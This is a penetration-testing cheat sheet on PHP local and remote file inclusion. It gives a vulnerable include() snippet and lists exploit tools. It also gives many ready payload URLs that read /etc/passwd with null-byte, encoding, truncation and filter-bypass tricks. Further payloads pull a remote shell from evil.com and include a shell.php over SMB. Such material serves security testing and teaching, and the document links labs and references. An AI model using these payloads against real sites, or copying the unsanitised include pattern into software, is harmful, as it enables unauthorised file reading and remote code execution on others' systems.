File Inclusion

A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.

Summary

• Tools

• Local File Inclusion

  • Null Byte

  • Double Encoding

  • UTF-8 Encoding

  • Path Truncation

  • Filter Bypass

• Remote File Inclusion

  • Null Byte

  • Double Encoding

  • Bypass allow_url_include

• Labs

• References

Tools

• P0cL4bs/Kadimus (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.

• D35m0nd142/LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner

• kurobeats/fimap - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.

• lightos/Panoptic - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.

• hansmach1ne/LFImap - Local File Inclusion discovery and exploitation tool

Local File Inclusion

File Inclusion Vulnerability should be differentiated from Path Traversal. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.

Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the page parameter to include local or remote files, leading to unauthorized access or code execution.

<?php
$file = $_GET['page'];
include($file);
?>

In the following examples we include the /etc/passwd file, check the Directory & Path Traversal chapter for more interesting files.

http://example.com/index.php?page=../../../etc/passwd

Null Byte

⚠️ In versions of PHP below 5.3.4 we can terminate with null byte (%00).

http://example.com/index.php?page=../../../etc/passwd%00

Example: Joomla! Component Web TV 1.0 - CVE-2010-1470

{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00

Double Encoding

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

UTF-8 Encoding

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

Path Truncation

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd

Filter Bypass

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

Remote File Inclusion

Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion doesn't work anymore on a default configuration since allow_url_include is now disabled since PHP 5.

allow_url_include = On

Most of the filter bypasses from LFI section can be reused for RFI.

http://example.com/index.php?page=http://evil.com/shell.txt

Null Byte

http://example.com/index.php?page=http://evil.com/shell.txt%00

Double Encoding

http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

Bypass allow_url_include

When allow_url_include and allow_url_fopen are set to Off. It is still possible to include a remote file on Windows box using the smb protocol.

1. Create a share open to everyone

2. Write a PHP code inside a file : shell.php

3. Include it http://example.com/index.php?page=\\10.0.0.1\share\shell.php

Labs

• Root Me - Local File Inclusion

• Root Me - Local File Inclusion - Double encoding

• Root Me - Remote File Inclusion

• Root Me - PHP - Filters

References

• CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018

• Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12

• Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris

• LFI Cheat Sheet - @Arr0way - 24 Apr 2016

• Testing for Local File Inclusion - OWASP - 25 June 2017

• Turning LFI into RFI - Grayson Christopher - 2017-08-14